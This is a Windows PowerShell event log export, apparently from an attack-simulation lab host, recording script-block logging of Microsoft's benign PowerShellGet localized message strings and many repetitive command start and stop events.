UnableToUninstallModuleVersion=The module '{0}' of version '{1}' in module base folder '{2}' was installed without side-by-side version support. Some versions are installed in this module base with side-by-side version support. Uninstall other versions of this module before uninstalling the most current version.
UnableToUninstallAsOtherModulesNeedThisModule=The module '{0}' of version '{1}' in module base folder '{2}' cannot be uninstalled, because one or more other modules '{3}' are dependent on this module. Uninstall the modules that depend on this module before uninstalling module '{4}'.
UnableToUninstallAsOtherScriptsNeedThisScript=The script '{0}' of version '{1}' in script base folder '{2}' cannot be uninstalled, because one or more other scripts '{3}' are dependent on this script. Uninstall the scripts that depend on this script before uninstalling script '{4}'.
RepositoryIsNotTrusted=Untrusted repository
QueryInstallUntrustedPackage=You are installing the modules from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to install the modules from '{1}'?
QueryInstallUntrustedScriptPackage=You are installing the scripts from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to install the scripts from '{1}'?
QuerySaveUntrustedPackage=You are downloading the modules from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to download the modules from '{1}'?
QuerySaveUntrustedScriptPackage=You are downloading the scripts from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to download the scripts from '{1}'?
SourceNotFound=Unable to find repository '{0}'. Use Get-PSRepository to see all available repositories.
PSGalleryApiV2Deprecated=PowerShell Gallery v2 has been deprecated.  Please run 'Update-Module -Name PowerShellGet' to update to PowerShell Gallery v3.  For more information, please visit our website at 'https://www.powershellgallery.com'.
PSGalleryApiV2Discontinued=PowerShell Gallery v2 has been discontinued.  Please run 'Update-Module -Name PowerShellGet' to update to PowerShell Gallery v3.  For more information, please visit our website at 'https://www.powershellgallery.com'.
PowerShellGalleryUnavailable=PowerShell Gallery is currently unavailable.  Please try again later.
PowerShellGetModuleIsNotInstalledProperly=The PowerShellGet module was not installed properly. Be sure that only one instance or version of the PowerShellGet module is installed in the path '{0}'.
PowerShelLGetModuleGotUpdated=The PowerShellGet module was updated successfully. Restart the process to use the updated version of the PowerShellGet module.
TagsShouldBeIncludedInManifestFile=Tags are now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest tag changes. You can run Update-ModuleManifest -Tags to update the manifest with tags.
ReleaseNotesShouldBeIncludedInManifestFile=ReleaseNotes is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest ReleaseNotes changes. You can run Update-ModuleManifest -ReleaseNotes to update the manifest with ReleaseNotes.
LicenseUriShouldBeIncludedInManifestFile=LicenseUri is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' with the newest LicenseUri changes. You can run Update-ModuleManifest -LicenseUri to update the manifest with LicenseUri.
IconUriShouldBeIncludedInManifestFile=IconUri is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest IconUri changes. You can run Update-ModuleManifest -IconUri to update the manifest with IconUri.
ProjectUriShouldBeIncludedInManifestFile=ProjectUri is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest ProjectUri changes. You can run Update-ModuleManifest -ProjectUri to update the manifest with ProjectUri.
ShouldIncludeFunctionsToExport=This module '{0}' has exported functions. As a best practice, include exported functions in the module manifest file(.psd1). You can run Update-ModuleManifest -FunctionsToExport to update the manifest with ExportedFunctions field.
ShouldIncludeCmdletsToExport=This module '{0}' has exported cmdlets. As a best practice, include exported cmdlets in the module manifest file(.psd1). You can run Update-ModuleManifest -CmdletsToExport to update the manifest with ExportedCmdlets field.
ShouldIncludeDscResourcesToExport=This module '{0}' has exported DscResources. As a best practice, include exported DSC resources in the module manifest file(.psd1). If your PowerShell version is higher than 5.0, run Update-ModuleManifest -DscResourcesToExport to update the manifest with ExportedDscResources field.
UpdateModuleManifestPathCannotFound=Cannot load the manifest file '{0}' properly. Please specify the correct manifest path.
UpdatedModuleManifestNotValid=Cannot update the manifest file '{0}' because the manifest is not val

ScriptBlock ID: b5078b5d-8a41-45b2-a7d5-f3637cd1accb
Path:
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467051
Keywords=None
Message=Creating Scriptblock text (1 of 3):
# Localized	03/28/2017 06:00 AM (GMT)	303:4.80.0411 	PSGet.Resource.psd1
#########################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# Localized PSGet.Resource.psd1
#
#########################################################################################

ConvertFrom-StringData @'
###PSLOC
InstallModulewhatIfMessage=Version '{1}' of module '{0}'
InstallScriptwhatIfMessage=Version '{1}' of script '{0}'
UpdateModulewhatIfMessage=Version '__OLDVERSION__' of module '{0}', updating to version '{1}'
UpdateScriptwhatIfMessage=Version '__OLDVERSION__' of script '{0}', updating to version '{1}'
PublishModulewhatIfMessage=Version '{0}' of module '{1}'
PublishScriptwhatIfMessage=Version '{0}' of script '{1}'
NewScriptFileInfowhatIfMessage=Creating the '{0}' PowerShell Script file
UpdateScriptFileInfowhatIfMessage=Updating the '{0}' PowerShell Script file
NameShouldNotContainWildcardCharacters=The specified name '{0}' should not contain any wildcard characters, please correct it and try again.
AllVersionsCannotBeUsedWithOtherVersionParameters=You cannot use the parameter AllVersions with RequiredVersion, MinimumVersion or MaximumVersion in the same command.
VersionRangeAndRequiredVersionCannotBeSpecifiedTogether=You cannot use the parameters RequiredVersion and either MinimumVersion or MaximumVersion in the same command. Specify only one of these parameters in your command.
RequiredVersionAllowedOnlyWithSingleModuleName=The RequiredVersion parameter is allowed only when a single module name is specified as the value of the Name parameter, without any wildcard characters.
MinimumVersionIsGreaterThanMaximumVersion=The specified MinimumVersion '{0}' is greater than the specified MaximumVersion '{1}'.
InstallModuleNeedsCurrentUserScopeParameterForNonAdminUser=Administrator rights are required to install modules in '{0}'. Log on to the computer with an account that has Administrator rights, and then try again, or install '{1}' by adding "-Scope CurrentUser" to your command. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
InstallScriptNeedsCurrentUserScopeParameterForNonAdminUser=Administrator rights are required to install scripts in '{0}'. Log on to the computer with an account that has Administrator rights, and then try again, or install '{1}' by adding "-Scope CurrentUser" to your command. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
VersionParametersAreAllowedOnlyWithSingleName=The RequiredVersion, MinimumVersion, MaximumVersion or AllVersions parameters are allowed only when you specify a single name as the value of the Name parameter, without any wildcard characters.
PathIsNotADirectory=The specified path '{0}' is not a valid directory.
ModuleAlreadyInstalled=Version '{0}' of module '{1}' is already installed at '{2}'. To delete version '{3}' and install version '{4}', run Install-Module, and add the -Force parameter.
ScriptAlreadyInstalled=Version '{0}' of script '{1}' is already installed at '{2}'. To delete version '{3}' and install version '{4}', run Install-Script, and add the -Force parameter.
CommandAlreadyAvailable=A command with name '{0}' is already available on this system. This script '{0}' may override the existing command. If you still want to install this script '{0}', use -Force parameter.
ModuleAlreadyInstalledSxS=Version '{0}' of module '{1}' is already installed at '{2}'. To install version '{3}', run Install-Module and add the -Force parameter, this command will install version '{5}' in side-by-side with version '{4}'.
ModuleAlreadyInstalledVerbose=Version '{0}' of module '{1}' is already installed at '{2}'.
ScriptAlreadyInstalledVerbose=Version '{0}' of script '{1}' is already installed at '{2}'.
ModuleWithRequiredVersionAlreadyInstalled=Version '{0}' of module '{1}' is already installed at '{2}'. To reinstall this version '{3}', run Install-Module or Updated-Module cmdlet with the -Force parameter.
InvalidPSModule=The module '{0}' cannot be installed or updated because it is not a properly-formed module.
InvalidPowerShellScriptFile=The script '{0}' cannot be installed or updated because it is not a properly-formed script.
InvalidAuthenticodeSignature=The module '{0}' cannot be installed or updated because the Authenticode signature for the file '{1}' is not valid.
ModuleNotInstalledOnThisMachine=Module '{0}' was not updated because no valid module was found in the module directory. Verify that the module is located in the folder specified by $env:PSModulePath.
ScriptNotInstalledOnThisMachine=Script '{0}' was not updated because no valid script was found in the script directories '{1}' and '{2}'.
AdminPrivilegesRequiredForUpdate=Module '{0}' (installed at'{1}') cannot be updated because Administrator rights are required to change that directory. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
AdminPrivilegesRequiredForScriptUpdate=Script '{0}' (installed at'{1}') cannot be updated because Administrator rights are required to change that script. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
ModuleNotInstalledUsingPowerShellGet=Module '{0}' was not installed by using Install-Module, so it cannot be updated.
ScriptNotInstalledUsingPowerShellGet=Script '{0}' was not installed by using Install-Script, so it cannot be updated.
DownloadingModuleFromGallery=Downloading module '{0}' with version '{1}' from the repository '{2}'.
DownloadingScriptFromGallery=Downloading script '{0}' with version '{1}' from the repository '{2}'.
NoUpdateAvailable=No updates were found for module '{0}'.
NoScriptUpdateAvailable=No updates were found for module '{0}'.
FoundModuleUpdate=An update for the module '{0}' was found with version '{1}'.
FoundScriptUpdate=An update for the script '{0}' was found with version '{1}'.
InvalidPSModuleDuringUpdate=Module '{0}' was not updated because the module in the repository '{1}' is not a valid Windows PowerShell module.
ModuleGotUpdated=Module '{0}' has been updated successfully.
TestingModuleInUse=Testing if the module to update is in use.
ModuleDestination=The specified module will be installed in '{0}'.
ScriptDestination=The specified script will be installed in '{0}' and its dependent modules will be installed in '{1}'.
ModuleIsInUse=Module '{0}' is in currently in use.
ModuleInstalledSuccessfully=Module '{0}' was installed successfully to path '{1}'.
ModuleSavedSuccessfully=Module '{0}' was saved successfully to path '{1}'.
ScriptInstalledSuccessfully=Script '{0}' was installed successfully to path '{1}'.
ScriptSavedSuccessfully=Script '{0}' was saved successfully to path '{1}'.
CheckingForModuleUpdate=Checking for updates for module '{0}'.
CheckingForScriptUpdate=Checking for updates for script '{0}'.
ModuleInUseWithProcessDetails=The version '{0}' of module '{1}' is currently in use. Retry the operation after closing the following applications: '{2}'.
ModuleVersionInUse=The version '{0}' of module '{1}' is currently in use. Retry the operation after closing the applications.
ModuleNotAvailableLocally=The specified module '{0}' was not published because no module with that name was found in any module directory.
InvalidModulePathToPublish=The specified module with path '{0}' was not published because no valid module was found with that path.
ModuleWithRequiredVersionNotAvailableLocally=The specified module '{0}' with version '{1}' was not published because no module with that name and version was found in any module directory.
AmbiguousModuleName=Modules with the name '{0}' are available under multiple paths. Add the -RequiredVersion parameter or the -Path parameter to specify the module to publish.
AmbiguousModulePath=Multiple versions are available under the specified module path '{0}'. Specify the full path to the module to be published.
PublishModuleLocation=Module '{0}' was found in '{1}'.
InvalidModuleToPublish=Module '{0}' cannot be published because it does not have a module manifest file. Run New-ModuleManifest -Path <PathName> to create a module manifest with metadata before publishing.
MissingRequiredManifestKeys=Module '{0}' cannot be published because it is missing required metadata. Verify that the module manifest specifies Description and Author.
ModuleVersionShouldBeGreaterThanGalleryVersion=Module '{0}' with version '{1}' cannot be published. The version must exceed the current version '{2}' that exists in the repository '{3}', or you must specify -Force.
ModuleVersionIsAlreadyAvailableInTheGallery=The module '{0}' with version '{1}' cannot be published as the current version '{2}' is already available in the repository '{3}'.
CouldNotInstallNuGetProvider=NuGet provider is required to interact with NuGet-based repositories. Please ensure that '{0}' or newer version of NuGet provider is installed.
CouldNotInstallNuGetExe=NuGet.exe is required to interact with NuGet-based repositories. Please ensure that NuGet.exe is available under one of the paths specified in PATH environment variable value.
CouldNotInstallNuGetBinaries2=PowerShellGet requires NuGet.exe and NuGet provider version '{0}' or newer to interact with the NuGet-based repositories. Please ensure that '{0}' or newer version of NuGet provider is installed and NuGet.exe is available under one of the paths specified in PATH environment variable value.
InstallNuGetProviderShouldContinueQuery=PowerShellGet requires NuGet provider version '{0}' or newer to interact with NuGet-based repositories. The NuGet provider must be available in '{1}' or '{2}'. You can also install the NuGet provider by running 'Install-PackageProvider -Name NuGet -MinimumVersion {0} -Force'. Do you want PowerShellGet to install and import the NuGet provider now?
InstallNuGetBinariesShouldContinueQuery2=PowerShellGet requires NuGet.exe and NuGet provider version '{0}' or newer to interact with the NuGet-based repositories. The NuGet provider must be available in '{1}' or '{2}'. You can also install the NuGet provider by running 'Install-PackageProvider -Name NuGet -MinimumVersion {0} -Force'. NuGet.exe must be available in '{3}' or '{4}, or under one of the paths specified in PATH environment variable value. NuGet.exe can be downloaded from http://nuget.org/nuget.exe. Do you want PowerShellGet to install both NuGet.exe and NuGet provider now?
InstallNuGetExeShouldContinueQuery=PowerShellGet requires NuGet.exe to publish an item to the NuGet-based repositories. NuGet.exe must be available in '{0}' or '{1}, or under one of the paths specified in PATH environment variable value. NuGet.exe can be downloaded from http://nuget.org/nuget.exe. Do you want PowerShellGet to install NuGet.exe now?
InstallNuGetBinariesShouldContinueCaption2=NuGet.exe and NuGet provider are required to continue
InstallNuGetProviderShouldContinueCaption=NuGet provider is required to continue
InstallNuGetExeShouldContinueCaption=NuGet.exe is required to continue
DownloadingNugetExe=Installing NuGet.exe.
DownloadingNugetProvider=Installing NuGet provider.
ModuleNotFound=Module '{0}' was not found.
NoMatchFound=No match was found for the specified search criteria and module names '{0}'.
NoMatchFoundForScriptName=No match was found for the specified search criteria and script names '{0}'.
FailedToCreateCompressedModule=Failed to generate the compressed file for module '{0}'.
FailedToPublish=Failed to publish module '{0}': '{1}'.
PublishedSuccessfully=Successfully published module '{0}' to the module publish location '{1}'. Please allow few minutes for '{2}' to show up in the search results.
InvalidWebUri=The specified Uri '{0}' for parameter '{1}' is an invalid Web Uri. Please ensure that it meets the Web Uri requirements.
RepositoryAlreadyRegistered=The repository could not be registered because there exists a registered repository with Name '{0}' and SourceLocation '{1}'. To register another repository with Name '{2}', please unregister the existing repository using the Unregister-PSRepository cmdlet.
RepositoryToBeUnregisteredNotFound=The repository '{0}' was not removed because no repository was found with that name. Please run Get-PSRepository and ensure that a repository of that name is present.
RepositoryCannotBeUnregistered=The specified repository '{0}' cannot be unregistered.
RepositoryNotFound=No repository with the name '{0}' was found.
PSGalleryNotFound=Unable to find repository '{0}'. Use Get-PSRepository to see all available repositories. Try again after specifying a valid repository name. You can use 'Register-PSRepository -Default' to register the PSGallery repository.
ParameterIsNotAllowedWithPSGallery=The PSGallery repository has pre-defined locations. The '{0}' parameter is not allowed, try again after removing the '{0}' parameter.
UseDefaultParameterSetOnRegisterPSRepository=Use 'Register-PSRepository -Default' to register the PSGallery repository.
RepositoryNameContainsWildCards=The repository name '{0}' should not have wildcards, correct it and try again.
InvalidRepository=The specified repository '{0}' is not a valid

ScriptBlock ID: b5078b5d-8a41-45b2-a7d5-f3637cd1accb
Path:
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467050
Keywords=None
Message=Started invocation of ScriptBlock ID: 45379c41-a4a5-4f66-b608-7333082ce12f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467049
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1b205386-42f5-4802-959a-91fa412bc989
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467048
Keywords=None
Message=Started invocation of ScriptBlock ID: 1b205386-42f5-4802-959a-91fa412bc989
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467047
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1b205386-42f5-4802-959a-91fa412bc989
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467046
Keywords=None
Message=Started invocation of ScriptBlock ID: 1b205386-42f5-4802-959a-91fa412bc989
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467045
Keywords=None
Message=Completed invocation of ScriptBlock ID: b9f337ef-d9f1-4356-be2d-20b6c86eb6cc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467044
Keywords=None
Message=Started invocation of ScriptBlock ID: b9f337ef-d9f1-4356-be2d-20b6c86eb6cc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467043
Keywords=None
Message=Completed invocation of ScriptBlock ID: 64663673-3388-407d-9a69-709aa0010c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467042
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467041
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467040
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467039
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467038
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467037
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467036
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467035
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467034
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467033
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467032
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467031
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467030
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467029
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467028
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467027
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467026
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467025
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467024
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467023
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
